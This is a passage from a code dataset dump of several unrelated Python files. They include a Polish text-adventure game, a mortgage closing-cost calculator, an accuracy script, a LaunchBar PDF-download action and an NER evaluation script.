Saving the current class + current weapons\nklasaitem = {\n\"Wojownik_saver\":\"0\",\n\"Berserker_saver\":\"0\",\n\"Mag_saver\":\"0\", \n\"Kapłan_saver\":\"0\",\n\"Łowca_saver\":\"0\"\n}\n\nclass actualitem:\n a_weapon = 0 # Attack of the current weapon\n a_magicweapon = 0 # Magic attack of the current weapon, i.e. Magic Power\n a_armor = 0 # Armor for the chest armor \n a_armor_mr = 0 # Magic Resist for the chest armor \n a_armor_hp = 0 # Extra hp for the chest armor\n a_ring_mp = 0 # Magic Power for the ring\n a_ring_mr = 0 # Magic Resist for the ring\n a_ring_hp = 0 # Extra hp for the ring\n a_helmet = 0 # Armor for the helmet\n a_helmet_mr = 0 # Magic Resist for the helmet\n a_legs = 0 # Armor for the leg armor\n a_legs_mr = 0 # Magic Resist for the leg armor\n a_boots = 0 # Armor for the boots\n \naitem = actualitem()\n\nclass ItemInterface():\n Name = \"\"\n Type = \"\"\n def equip(self, hero):\n pass\n\n def unequip(self, hero):\n pass\n\n def info(self):\n pass\n \nclass Dlugi_Miecz(ItemInterface):\n Id = \"Id1\"\n Name = \"Długi Miecz\"\n Type = \"Miecz\"\n Attack = 3\n def equip(self, hero):\n aitem.a_weapon += 3\n \n def unequip(self, hero):\n aitem.a_weapon -= 3\n\n def info(self):\n cls()\n printlok(\"Opis przedmiotu:\",\"Długi Miecz (%s)\" % self.Id)\n print(\"Typ: %s\\nAttack: %d\" % (self.Type, self.Attack))\n\nid1 = Dlugi_Miecz()\n \n \n \n#\n# Skill tree:\n#\n\n\nclass SkillsTree:\n def show(self):\n if klasaitem[\"Wojownik_saver\"] == \"1\":\n pass\n \n if klasaitem[\"Mag_saver\"] == \"1\":\n pass\n \n if klasaitem[\"Berserker_saver\"] == \"1\":\n pass\n \n if klasaitem[\"Kapłan_saver\"] == \"1\":\n pass\n \n if klasaitem[\"Łowca_saver\"] == \"1\":\n pass\n \n else:\n print(\" cos tam \")\n \n def wojownik_skills(self):\n cls()\n printopis(\"Drzewko Umiejętności\")\n print(\" Punkty umiejętności: %d \")\n print(\"\")\n \n \ntree = SkillsTree()\n\n \ndef checkall():\n global maxhp, attack, magicpower, armor, magicresist\n lvl.lvlcheck() \n maxhp = l_maxhp + aitem.a_armor_hp + aitem.a_ring_hp\n attack = l_attack + aitem.a_weapon \n magicpower = aitem.a_magicweapon + aitem.a_ring_mp \n armor = aitem.a_helmet + aitem.a_boots + aitem.a_armor + aitem.a_legs \n magicresist = aitem.a_armor_mr + aitem.a_legs_mr + aitem.a_helmet_mr\n if klasaitem[\"Wojownik_saver\"] == \"1\":\n armor *= 1.2\n attack *= 1.2 \n if klasaitem[\"Berserker_saver\"] == \"1\":\n maxhp *= 1.2\n attack *= 1.4\n armor *= 0.8 \n if klasaitem[\"Mag_saver\"] == \"1\": \n magicpower *= 1.3\n magicresist *= 1.3\n maxhp *= 0.9\n armor *= 0.9\n if klasaitem[\"Kapłan_saver\"] == \"1\":\n magicpower *= 1.2\n magicresist *= 1.1 \n if klasaitem[\"Łowca_saver\"] == \"1\":\n attack *= 1.4 \n \nclass hero:\n location = None\n global klasaitem \n myname = nick\n lvl = \"\" \n klasa = \"Brak Klasy\"\n monety = 0 \n \n \n\n #Hero classes\n def sprawdzklase(self):\n self.wojownik() \n self.mag() \n self.kaplan() \n self.lowca() \n self.berserker() \n \n def wojownik(self):\n if klasaitem[\"Wojownik_saver\"] == \"1\": \n self.klasa = \"Wojownik\" \n \n def mag(self):\n if klasaitem[\"Mag_saver\"] == \"1\": \n self.klasa = \"Mag\"\n \n def kaplan(self): \n if klasaitem[\"Kapłan_saver\"] == \"1\":\n self.klasa = \"Kapłan\" \n \n def lowca(self):\n if klasaitem[\"Łowca_saver\"] == \"1\":\n self.klasa = \"Lowca\"\n \n def berserker(self):\n if klasaitem[\"Berserker_saver\"] == \"1\":\n self.klasa = \"Berserker\"\n \n \n def klasa_start(self):\n while True: \n print(\"Wpisz wybraną klase\\n(wojownik, lucznik, lowca, mag)\") \n klasa_vote = sys.stdin.readline().strip()\n if klasa_vote == 'wojownik': \n 
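# each recognized class name just prints a confirmation and breaks out of the input loop; anything else re-prompts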
print(\"Wybrales klase wojownik\")\n break \n if klasa_vote == 'costam':\n print(\"Wybrales klase costam\") \n break\n else:\n print(\"Niestety zle wpisales klase! Spróbuj jeszcze raz wpisac!\") \n \n \n \n \n def profil(self):\n set_color(GREEN|LIGHT)\n print(\"++==============================++\")\n print(\"|| \", end=\"\")\n set_color(RED)\n print(\"Porfil Bohatera\", end=\"\")\n set_color(GREEN|LIGHT)\n print(\" ||\")\n set_color(GREEN|LIGHT) \n print(\"++==============================++\\n\") \n print(\"Nick: %s\" % self.myname)\n print(\"Klasa: %s\" % self.klasa) \n print(\"LvL: %s\" % self.lvl) \n print(\"Exp: %d\" % exp)\n print(\"Monety: %d \\n\" % self.monety) \n print(\"---------------------------\\n\") \n print(\"Hp: %d\" % maxhp)\n print(\"Attack: %d\" % attack)\n print(\"Magic Power: %d\" % magicpower) \n print(\"Armor: %d\" % armor)\n print(\"Magic Resist %d\" % magicresist) \n \ninstancja = hero() \n \n \n# Command book \n\nglobalcommands = {\n\"info\":info,\n\"quest\":questy,\n\"questy\":questy,\n\"mapa\":mapa,\n\"ekwipunek\":ekwipunek,\n\"eq\":ekwipunek,\n\"tree\":tree.show,\n\"opis id1\":id1.info\n}\n\nherocommands = {\n\"profil\":hero.profil,\n}\n\nlive_location = {\n}\n\ndef move(c):\n if c in live_location:\n instancja.location = live_location[c] \n return True\n live_location[c] = c()\n instancja.location = live_location[c]\n \n# Zmienne dot. przejścia gry \n# Potem trzeba zapisywanie zrobić w json\n# Zapisywanie postępów questów i gry\ngamesave = {\n\"quest1\":1, \n}\n\ndef quest_1():\n global gamesave \n if gamesave[\"quest1\"] == 0:\n printopis(\"Wstęp do gry..\")\n mytext = \"\"\"Jeden dzień drogi pozostał ku celu twej podróży. Przez tydzień czasu w drodze\\nzdałeś sobie sprawę, iż kilka bezczynnych dni może przeciągać się długimi\\nmiesiącami. I dzięki Bogu, że nuda, nie rozpacz towarzyszyły tobie przez cały\\nczas. Wiesz o tym. Zdajesz sobie z tego sprawę i modlisz się, aby ostatni dzień pozostał w twej pamięci jako cisza przed burzą. Przed burzą, która czyha\\nna ciebie na miejscu - w mieście Dennergrave.\n Czas długich modlitw barona Arnafa i jego poddanych zagościł między murami\\ntejże potężnej warowni. Lamenty i żebry stały się codziennością, a zachód\\nsłońca zwiastunem śmierci. Wschód zaś ostrzeżeniem przed następnym zachodem,\\nczęsto po niezwykle długim, przepełnionym negatywnymi emocjami dniu, jednak\\nnieco lepszym niż potworną nocą.\n Powiadomiono cię, iż sprawcą całego zamieszania tkwi pod Dennergrave - w\\nstarych jak świat kanałach, do których nikt nie zapuszczał się latami. Bestia\\nmiała czas na rozwój. Wykorzystała go... \n Dlatego wybrano ciebie - doświadczonego i nieugiętego człeka. Nie pierwszego\\nlepszego szlacheckiego rycerzyka, który przy dobrej okazji zwinąłby manatki,\\nzostawiając gówno, jakie narobiłby ze strachu. Niestety i ty bez informacji o\\nkreaturze niewiele zdziałasz, a mało kto takowe posiada. 
\n Cisza trwa nadal, lecz miej oczy szeroko otwarte - nie wiadomo, jak szybko\\n się skończy.\\n\\n\"\"\"\n printtekstslow(mytext)\n linia = (\"===============================================================================\\n\")\n printtekst(linia)\n print(\"(Aby przejść dalej napisz \", end=\"\")\n set_color(LIGHT|BLUE)\n print(\"start\", end=\"\")\n print(\")\\n\")\n set_color(None)\n askfirst = sys.stdin.readline().strip()\n while True:\n if askfirst == \"start\":\n cls()\n printcore(\"Dennergrave\")\n set_color(BLUE)\n print(\"Gryspir \", end=\"\")\n set_color(LIGHT|RED)\n print(\"mówi: \")\n set_color(None)\n text = \"\"\"Witaj w miescie mlody wojowniku!Cieszymy sie na twoje przybycie, naucze Cie podstaw poruszania sie po naszym swiecie.Poruszamy sie za pomoca uzycia polecenia idz np. idz west \nWszystkie lokalizacje w miescie mozesz znalezc uzyc polecenia mapa. \nCzyli jezeli bedziesz chcial isc do karczmy jakiego polecenia uzyjesz?\\n\"\"\"\n printtekst(text)\n while True:\n quest1q1 = sys.stdin.readline().strip()\n if quest1q1 == 'idz karczma':\n set_color(BLUE)\n print(\"Gryspir \", end=\"\")\n set_color(LIGHT|RED)\n print(\"mówi: \")\n set_color(None) \n text2 = (\"Swietnie! Szybko sie uczysz\"\n \"Aby wyjsc z miasta uzywamy idz oraz dopisek west, north, east, south.\"\n \"Aby dowiedziec sie wiecej co gdzie sie znajduje uzywaj polecenia mapa\" \n \"To juz chyba wszystko na dzis! Milych przygod w naszym swiecie! \")\n printtekst(text2)\n print(\"\\n\\n !!! Zadanie Wykonane !!!\\n Nazwa: Samouczek\\n\") \n gamesave[\"quest1\"] = 1\n print(\"\\nOd teraz wpisujesz sam polecenia! Najlepiej zapoznaj się z mapą.\\n\")\n break \n else:\n print(\"Ehh.. Mialo byc idz karczma . Wpisz jeszcze raz\") \n else:\n print(\"Hmm?\") \n \n \ndef startgame():\n set_color(BLUE|LIGHT)\n print(\" _______ _ _ _ \")\n time.sleep(0.1)\n print(\" |__ __| | | /\\ | | | | \")\n time.sleep(0.1)\n print(\" | | _____ _| |_ / \\ __| |_ _____ _ __ | |_ _ _ _ __ ___ \")\n time.sleep(0.1)\n print(\" | |/ _ \\ \\/ / __| / /\\ \\ / _` \\ \\ / / _ \\ '_ \\| __| | | | '__/ _ \\ \")\n time.sleep(0.1)\n print(\" | | __/> <| |_ / ____ \\ (_| |\\ V / __/ | | | |_| |_| | | | __/\")\n time.sleep(0.1)\n print(\" |_|\\___/_/\\_\\\\__| /_/ \\_\\__,_| \\_/ \\___|_| |_|\\__|\\__,_|_| \\___|\")\n set_color(None)\n time.sleep(0.1)\n print(\"\\n\\n\\n\\n Menu Gry:\")\n time.sleep(0.11)\n print(\" 1.)Graj\")\n time.sleep(0.11)\n print(\" 2.)Ustawienia\")\n time.sleep(0.11)\n print(\" 3.)Wyjdz\\n\\n\\n\\n\\n\\n\\n\")\n time.sleep(0.1)\n set_color(BLUE)\n print(\" development version 0.0.1\")\n set_color(BLUE|LIGHT)\n print(\" Create by maskara.(www.masakradev.tk)\")\n print(\" Special Thanks for Gynvael\")\n set_color(None)\n abc = sys.stdin.readline().strip()\n while True:\n if abc == \"1\":\n cls()\n play()\n break\n if abc == \"2\":\n settings()\n break\n if abc == \"3\":\n sys.exit()\n break\n else:\n print(\"Wybierz opcje od 1 do 3\")\n \n\ndef play():\n quest_1()\n move(LocDMiasto)\n old_location = None\n while True:\n if old_location != instancja.location: \n if instancja.location.showlocation() is False:\n continue\n old_location = instancja.location \n entercommand = sys.stdin.readline().strip() \n if entercommand in globalcommands: \n globalcommands[entercommand]()\n continue\n if entercommand in herocommands:\n herocommands[entercommand](instancja)\n continue\n if instancja.location.core(entercommand) is True:\n continue \n else:\n print(\"Ups.. 
Nie ma takiego polecenia\") \ncheckall() \nlvl.lvlcheck()\nstartgame() \n \ndef settings(): \n print(\"Ustawienia\") \n \n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":21537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"202287084","text":"\"\"\"Closing costs\"\"\"\n\nimport copy\nimport enum\nimport logging\n\nfrom bloodloan.mortgage import mmath\nfrom bloodloan.mortgage import schedule\n\n\nlogger = logging.getLogger(__name__) # pylint: disable=C0103\n\n\nclass CCCalcType(enum.Enum):\n \"\"\"Determines how the amount of the ClosingCost is calculated\n\n DOLLAR_AMOUNT a raw dollar amount\n SALE_FRACTION a percentage of the sale price\n LOAN_FRACTION a percentage of the loan\n INTEREST_MONTHS a number representing months (or a month fraction)\n of interest to be paid in advance\n PROPERTY_TAX_FRACTION a percentage of the first year of property taxes\n \"\"\"\n DOLLAR_AMOUNT = enum.auto()\n SALE_FRACTION = enum.auto()\n LOAN_FRACTION = enum.auto()\n INTEREST_MONTHS = enum.auto()\n PROPERTY_TAX_FRACTION = enum.auto()\n\n\nclass CCPayType(enum.Enum):\n \"\"\"Determines how the ClosingCost will be paid\n\n PRINCIPAL added to the total amount of the loan\n DOWN_PAYMENT the down payment (probably there is just one)\n FEE fees owed to other parties\n \"\"\"\n PRINCIPAL = enum.auto()\n DOWN_PAYMENT = enum.auto()\n FEE = enum.auto()\n\n\nclass ClosingCost():\n \"\"\"A single closing cost line item\n\n Properties:\n label: an arbitrary text label\n value the value to be paid, expressed in dollars\n calc how the value amount is calculated\n for DOLLAR_AMOUNT, this is empty; for other calculation\n types, it may be a percentage or something else; see\n CCCalcType for more information\n calctype how the value is to be interpreted\n should be a CCCalcType\n paytype how the payment is applied\n should be a CCPayType\n \"\"\"\n\n def __init__(\n self,\n label=None,\n value=None,\n calc=None,\n calctype=CCCalcType.DOLLAR_AMOUNT,\n paytype=CCPayType.FEE):\n self.label = label\n self.value = value\n self.calc = calc\n self.calctype = calctype\n self.paytype = paytype\n\n def __str__(self):\n return f\"{self.label} - {self.value} ({self.paytype.name})\"\n\n def __repr__(self):\n return str(self)\n\n\nIRONHARBOR_FHA_CLOSING_COSTS = [\n ClosingCost(\n \"Down payment\",\n calc=3.5,\n calctype=CCCalcType.SALE_FRACTION,\n paytype=CCPayType.DOWN_PAYMENT),\n ClosingCost(\n \"Upfront FHA mortgage insurance\",\n calc=1.75,\n calctype=CCCalcType.LOAN_FRACTION,\n paytype=CCPayType.PRINCIPAL),\n ClosingCost(\n \"Prepaid interest (est 15 days)\",\n calc=0.5,\n calctype=CCCalcType.INTEREST_MONTHS,\n paytype=CCPayType.FEE),\n ClosingCost(\n \"Taxes escrow (3 months)\",\n calc=0.25,\n calctype=CCCalcType.PROPERTY_TAX_FRACTION,\n paytype=CCPayType.FEE),\n\n # The broker will give origination options to the buyer, which affect the\n # interest rate\n # The buyer might choose to pay a higher fee with a lower interest rate,\n # or instead a negative fee (aka cash in hand) for a higher interest rate\n ClosingCost(\"Origination points\", 0),\n\n ClosingCost(\"Flat lender fee\", 600),\n ClosingCost(\"Appraisal\", 495),\n ClosingCost(\"Lender attorney\", 150),\n ClosingCost(\"Tax service\", 72),\n ClosingCost(\"Credit reports/supplements\", 150),\n ClosingCost(\"Title lenders and endorsements\", 443),\n ClosingCost(\"Title closing/courier fee\", 450),\n ClosingCost(\"County recording\", 175),\n ClosingCost(\"Estimated prepaid insurance (1 
year)\", 1440),\n ClosingCost(\"Insurance escrow (3 months)\", 360),\n]\n\n\nclass CloseResult:\n \"\"\"The result of a close() function call\"\"\"\n\n def __init__(self, saleprice=0, downpayment=None, fees=None, principal=None):\n self.saleprice = saleprice\n self.downpayment = downpayment or []\n self.fees = fees or []\n self.principal = principal or []\n\n def sum(self, costs):\n \"\"\"Sum up costs\"\"\"\n total = 0\n for cost in costs:\n total += cost.value\n return total\n\n @property\n def downpayment_total(self):\n \"\"\"Total downpayment\"\"\"\n return self.sum(self.downpayment)\n\n @property\n def fees_total(self):\n \"\"\"Total fees\"\"\"\n return self.sum(self.fees)\n\n @property\n def principal_total(self):\n \"\"\"Total principal\"\"\"\n return self.sum(self.principal)\n\n def apply(self, cost):\n \"\"\"Add a ClosingCost\"\"\"\n logger.info(f\"Closing cost: {cost}\")\n\n if cost.paytype == CCPayType.PRINCIPAL:\n self.principal.append(cost)\n\n elif cost.paytype == CCPayType.DOWN_PAYMENT:\n self.downpayment.append(cost)\n principalvalue = self.saleprice - cost.value\n self.principal.append(ClosingCost(\n \"Principal\",\n value=principalvalue,\n paytype=CCPayType.PRINCIPAL))\n\n elif cost.paytype == CCPayType.FEE:\n self.fees.append(cost)\n\n else:\n raise Exception(f\"Unknown paytype {cost.paytype}\")\n\n\ndef close(saleprice, interestrate, loanterm, propertytaxes, costs):\n \"\"\"Calculate loan amount and closing costs\n\n saleprice sale price for the property\n interestrate interest rate for the loan\n loanterm loan term in months\n propertytaxes estimated property taxes\n costs list of ClosingCost objects\n \"\"\"\n\n result = CloseResult(saleprice=saleprice)\n\n # Don't modify costs we were passed, in case they are reused elsewhere\n costs = copy.deepcopy(costs)\n\n # BEWARE!\n # ORDER IS IMPORTANT AND SUBTLE!\n\n for cost in costs:\n # First, check our inputs\n if cost.calctype == CCCalcType.DOLLAR_AMOUNT and cost.value is None:\n raise Exception(\n f\"The {cost.label} ClosingCost calctype is DOLLAR_AMOUNT, \"\n \"but with an empty value property\")\n elif cost.calctype != CCCalcType.DOLLAR_AMOUNT and cost.calc is None:\n raise Exception(\n f\"The {cost.label} ClosingCost calctype is {cost.calctype}, \"\n \"but with an empty calc property\")\n\n # Now calculate what can be calculated now\n # Don't calculate LOAN_FRACTION or INTEREST_MONTHS calctypes here,\n # because any PRINCIPAL paytypes will affect their value\n if cost.calctype == CCCalcType.DOLLAR_AMOUNT:\n result.apply(cost)\n if cost.calctype == CCCalcType.SALE_FRACTION:\n cost.value = saleprice * mmath.percent2decimal(cost.calc)\n result.apply(cost)\n elif cost.calctype == CCCalcType.PROPERTY_TAX_FRACTION:\n cost.value = propertytaxes * mmath.percent2decimal(cost.calc)\n result.apply(cost)\n\n for cost in costs:\n # Now that we have calculated the other costs, including loan amount,\n # we can calculate LOAN_FRACTION or INTEREST_MONTHS calctypes\n # Note that theoretically you could have something weird like a cost of\n # calctype=LOAN_FRACTION paytype=PRINCIPAL,\n # but that wouldn't make much sense so we don't really handle it here\n if cost.calctype == CCCalcType.LOAN_FRACTION:\n cost.value = result.principal_total * mmath.percent2decimal(cost.calc)\n result.apply(cost)\n elif cost.calctype == CCCalcType.INTEREST_MONTHS:\n # TODO: Improve INTEREST_MONTHS closing cost calculation\n # 1) Assumes interest is the same in all months (not true)\n # OK because we don't expect INTEREST_MONTHS to be many months long\n # 
2) Assumes saleprice == value\n # OK for now but should be fixed at some point\n monthgen = schedule.schedule(\n interestrate, saleprice, result.principal_total, saleprice, loanterm)\n firstmonth = monthgen.__next__()\n cost.value = firstmonth.interestpmt * cost.calc\n result.apply(cost)\n\n return result\n","sub_path":"bloodloan/mortgage/closing.py","file_name":"closing.py","file_ext":"py","file_size_in_byte":8108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"506466253","text":"# python accuracy.py result_pro.txt label.txt\n\nimport sys\n\nf_result = sys.argv[1]\nf_label = sys.argv[2]\n\nprint(\"The result file with probabilities is: \"+f_result)\nprint(\"The label file is: \"+f_label)\n\nidx2label = {}\n\nwith open(f_result) as fr:\n\tlines = fr.readlines()\n\tfor line in lines:\n\t\tline = line.strip()\n\t\tfeatures = line.replace('(',')').replace(') : ',')').replace('\\n','').split(\")\")\n\t\tprint(features)\n\n\t\tpredicate = features[0]\n\t\tidx, label = features[1].replace(', ',',').split(\",\")\n\t\tpro = features[2].strip()\n\n\t\t# print(predicate + \"\\n\"+ idx+\"\\n\"+label+\"\\n\" + pro)\n\t\tif predicate in idx2label:\n\t\t\tif idx in idx2label[predicate]:\n\t\t\t\t# compare the new probability with the old one\n\t\t\t\tif float(pro) > idx2label[predicate][idx][1]:\n\t\t\t\t\tidx2label[predicate][idx] = [label, float(pro)]\n\t\t\telse:\n\t\t\t\tidx2label[predicate][idx] = [label, float(pro)]\n\t\telse:\n\t\t\tidx2label[predicate] = {}\n\t\t\tidx2label[predicate][idx] = [label, float(pro)]\n\t# print(idx2label)\n\nwith open(f_label) as fr:\n\tcountCorrect = 0\n\tcountFalse = 0\n\tcountUnpredict = 0\n\n\tTP = 0\n\tTN = 0\n\n\tFP = 0\n\tFN = 0\n\n\tlines = fr.readlines()\n\tfor line in lines:\n\t\tfeatures = line.replace('(',')').replace('\\n','').split(\")\")\n\t\tprint(features)\n\t\tif len(features) <2:\n\t\t\tpass\n\t\t\t# print(\"!!!!line:\\n\")\n\t\t\t# print(line)\n\t\telse:\n\t\t\tpredicate = features[0]\n\t\t\tidx, label = features[1].replace(', ',',').split(\",\")\n\n\t\t\tif predicate in idx2label:\n\t\t\t\tif idx in idx2label[predicate]:\n\t\t\t\t\tif label == idx2label[predicate][idx][0]:\n\t\t\t\t\t\tcountCorrect += 1\n\t\t\t\t\t\tif label == \"1\":\n\t\t\t\t\t\t\tTP += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tTN += 1\n\t\t\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tcountFalse += 1\n\t\t\t\t\t\tif label == \"0\":\n\t\t\t\t\t\t\tFN += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tFP += 1\n\t\t\t\telse:\n\t\t\t\t\tcountUnpredict += 1\n\t\t\t\t\tprint(\"Index \"+ idx + \" not shown in the result file -- no prediction was made.\")\n\t\t\telse:\n\t\t\t\tprint(\"Predicate\" + predicate + \" not shown in the result file.\")\n\n\tprint(\"TP: \" + str(TP))\n\tprint(\"TN: \" + str(TN))\n\tprint(\"FP: \" + str(FP))\n\tprint(\"FN: \" + str(FN))\n\n\tprint(\"Correct Prediction: \" + str(countCorrect))\n\tprint(\"False Prediction: \" + str(countFalse))\n\tprint(\"Not Predicted: \" + str(countUnpredict))\n\tprint(\"Precision: \" + str(TP/(TP+FP)))\n\tprint(\"Recall: \" + str(TP/(TP+FN)))\n\n\tprint(\"Accuracy: \"+ str(float(countCorrect)/(countCorrect+countFalse)))\n","sub_path":"ETRI/2018/final_report/LPMLN_NN/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"479447389","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 2 15:52:08 2018\n\n@author: wangyf\n\"\"\"\n\nfrom structure_constants import 
mother, dz\nimport lattice_functions as lf\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport json\n\nempty = 'grey'\nfilled = 'r'\nocc = [empty, filled]\n\n'''\nonly draw 1st nearest neighbors?\n'''\nNN1 = 0\n'''\nDraw mother/conifgurations/clusters?\n'''\ndraw = [1, 0, 0]\n\n\nClusters = lf.clusters(occ, NN1, draw)\nClusters.get_mother(mother, dz)\nGm = Clusters.Gm\n\nwith open('ES_iso.json') as f:\n ES_data = json.load(f)\n \nEc = ES_data['E_iso']\nconfig = ES_data['config_iso']\n#%%\n'''\nCreate Configurations\n'''\nClusters.get_configs(config)\nGsv = Clusters.Gsv\n\n\n#%%\n'''\nCreate clusters\n'''\nsub = lf.subgraphs(mother, dz)\nGcv1 = sub.get_s2(1)\nGcv2 = sub.get_s2(2)\nGcv3 = sub.get_s2(3)\nGcv4 = sub.get_s2(4)\n\n#%%\npickle.dump([Gm, Gsv, Gcv1, Gcv2, Gcv3, Gcv4], open('clusters.p','wb'))\n\n","sub_path":"Cluster-Expansion/v4_new_config/generate_config.py","file_name":"generate_config.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"430781980","text":"#!/usr/local/anaconda3/bin/python\n#\n# LaunchBar Action Script\n#\nimport sys\nimport subprocess as sp\nimport os\nimport new_file\n\nmy_env = os.environ.copy()\nmy_env[\"PATH\"] = \"/usr/local/bin:\" + my_env[\"PATH\"]\n\nfor arg in sys.argv[1:]: \n my_command = [\"aria2c\", arg]\n a = str(sp.check_output(my_command, env=my_env))\n jsp = a[(a.rfind(\"B/s|\")+4):(a.rfind(\".jsp\")+4)]\n print(jsp)\n file = open(jsp)\n os.remove(jsp)\n \n for line in file:\n if \"iframe src=\" in line:\n anfang = line.find(\"https://\")\n end = line.find(\".pdf\")\n pdf = line[anfang:end+4]\n# \n print(pdf)\n my_command = [\"aria2c\", pdf]\n a = str(sp.check_output(my_command, env=my_env))\n file = a[(a.rfind(\"B/s|\")+4):(a.rfind(\".pdf\")+4)]\n new_file.lb_notification(\"New Document downloaded!\",file)\n\n\n","sub_path":"download_ieee_pdf_document.lbaction/Contents/Scripts/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"285755430","text":"from model.data_utils import CoNLLDataset\nfrom model.ner_model import NERModel\nfrom model.config import Config\n\nRESPONSE = {\n 'Amount':None,\n 'Merchant': None,\n\t'Date': None,\n\t'Address': None\n}\n\nKEYS = ['Amount', 'Merchant', 'Date', 'Address']\nPREFIX_BIO = ['B', 'I']\n\nTEXT_STR = '521 Hoang Van\\n Hoang Van Thu Q.Tan Binh\\n DON\\n 23/06/2018(Thu\\n 08:10\\n Temakionigiri\\n 16.000\\n 16,000*\\n tinh:\\n cong:\\n 16,000\\n iue\\n So don:2-69318 Thu ngan:120013\\n khach nhu cau xuat hca don do,\\n vien toi\\n '\n\nTEXT_STR_1 = '521 Hoang Van Hoang Van Thu Q.Tan Binh'\n\nTEXT_STR_2 = 'CIRCLE K VIETNAM\\n 124 Pho Quang. W.9. Phu Nhuan.D. HCM\\n Receipt No: 088 02 20180628 0314\\n Date: jun, 29 2018 06:12 PM\\n Jun 28,\\n Cashier: 5473-Diem Tan Thi Le\\n Description:\\n 1 NESTEA Tea LemON Small 120z*1CP 7,000\\n 1 Item(s) (VAT included) 7,000\\n CASH\\n 7,000\\n CHANGE\\n '\n\nTEXT_STR_3 = 'CIRCLE K VIETNAM\\n\\\n968 3/2 Street. 
Ward 15 Dist 11 HCMC\\n\\\nReceipt No: 153 02 20180630 0046\\n\\\nDate: Jun 30, 2018 07:37 AM\\n\\\nCashier: 5022-Vi Ngo Nguyen Yen\\n\\\nDescription:\\n\\\nCK Mixed Drinkime Soda\\n\\\nNoodle with Fried Egg 14,000\\n\\\nDC//C+ VTM C 350 6,000\\n\\\n2 Item(s) (VAT included) 20,000\\n\\\n20,000\\n\\\nCASH\\n\\\nCHANGE\\n\\\n'\n\ndef get_data_from_key(data, key):\n output = []\n\n # B to I\n prefix_key = 'B-' + key\n for idx, pred in enumerate(data['output']):\n if pred == prefix_key:\n output.append(data['input'][idx])\n found = False\n prefix_key_i = 'I-' + key\n for i, pred_i in enumerate(data['output'][idx:]):\n if pred_i == prefix_key_i:\n found = True\n output.append(data['input'][i + idx])\n print(data['input'][i + idx], i, idx)\n elif found == True:\n break\n break\n\n if len(output) > 0:\n return ' '.join(output)\n\n # I only\n prefix_key = 'I-' + key\n found = False\n for idx, pred in enumerate(data['output']):\n if pred == prefix_key:\n found = True\n output.append(data['input'][idx])\n elif found == True:\n return ' '.join(output)\n\n\n\n\n for prefix in PREFIX_BIO:\n prefix_key = prefix + '-' + key\n print(prefix_key)\n for idx, pred in enumerate(data['output']):\n if pred == prefix_key:\n print(idx)\n output.append(data['input'][idx])\n\n return output\n\ndef align_data(data):\n \"\"\"Given dict with lists, creates aligned strings\n\n Adapted from Assignment 3 of CS224N\n\n Args:\n data: (dict) data[\"x\"] = [\"I\", \"love\", \"you\"]\n (dict) data[\"y\"] = [\"O\", \"O\", \"O\"]\n\n Returns:\n data_aligned: (dict) data_align[\"x\"] = \"I love you\"\n data_align[\"y\"] = \"O O O \"\n\n \"\"\"\n spacings = [max([len(seq[i]) for seq in data.values()])\n for i in range(len(data[list(data.keys())[0]]))]\n data_aligned = dict()\n\n # for each entry, create aligned string\n for key, seq in data.items():\n str_aligned = \"\"\n for token, spacing in zip(seq, spacings):\n str_aligned += token + \" \" * (spacing - len(token) + 1)\n\n data_aligned[key] = str_aligned\n \n print(seq)\n\n return data_aligned\n\n\n\ndef interactive_shell(model):\n \"\"\"Creates interactive shell to play with model\n\n Args:\n model: instance of NERModel\n\n \"\"\"\n model.logger.info(\"\"\"\nThis is an interactive mode.\nTo exit, enter 'exit'.\nYou can enter a sentence like\ninput> I love Paris\"\"\")\n\n while True:\n try:\n # for python 2\n sentence = raw_input(\"input> \")\n except NameError:\n # for python 3\n sentence = input(\"input> \")\n\n words_raw = sentence.strip().split(\" \")\n\n if words_raw == [\"exit\"]:\n break\n\n preds = model.predict(words_raw)\n # to_print = align_data({\"input\": words_raw, \"output\": preds})\n model.logger.info(preds)\n print(preds)\n # for key in KEYS:\n # print(key)\n # value = get_data_from_key({'input': words_raw, 'output': preds}, key)\n # print(value)\n\n # for key, seq in to_print.items():\n # model.logger.info(seq)\ndef load_model():\n config = Config()\n\n # build model\n model = NERModel(config)\n model.build()\n model.restore_session(config.dir_model)\n\n return model\n\ndef predict_from_text(model, text):\n lines = text.split('\\n')\n words = []\n prediction = []\n for line in lines:\n token = line.strip().split(' ')\n preds = model.predict(token)\n words = words + token\n prediction = prediction + preds\n\n # print(words)\n # print(prediction)\n response = {}\n for key in KEYS:\n print(key)\n value = get_data_from_key({'input': words, 'output': prediction}, key)\n if len(value) > 0:\n response[key] = value\n return response\n\n\ndef main():\n model = 
load_model()\n # create instance of config\n # config = Config()\n\n # # build model\n # model = NERModel(config)\n # model.build()\n # model.restore_session(config.dir_model)\n\n # create dataset\n # test = CoNLLDataset(config.filename_test, config.processing_word,\n # config.processing_tag, config.max_iter)\n\n # evaluate and interact\n # DkS, stop evaluate\n # model.evaluate(test)\n # interactive_shell(model)\n test_string = TEXT_STR_3\n response = predict_from_text(model, test_string)\n\n print(response)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"123846137","text":"from Services.KahlaConversationApiService import KahlaConversationApiService\nimport json\n\nclass ProcessMessage(object):\n def __init__(self):\n self.conversionservice = KahlaConversationApiService()\n\n def processMessage(self, message):\n if message.find(\"[img]\") >= 0:\n message = message.split(\"]\")[1].split(\"-\")[0]\n 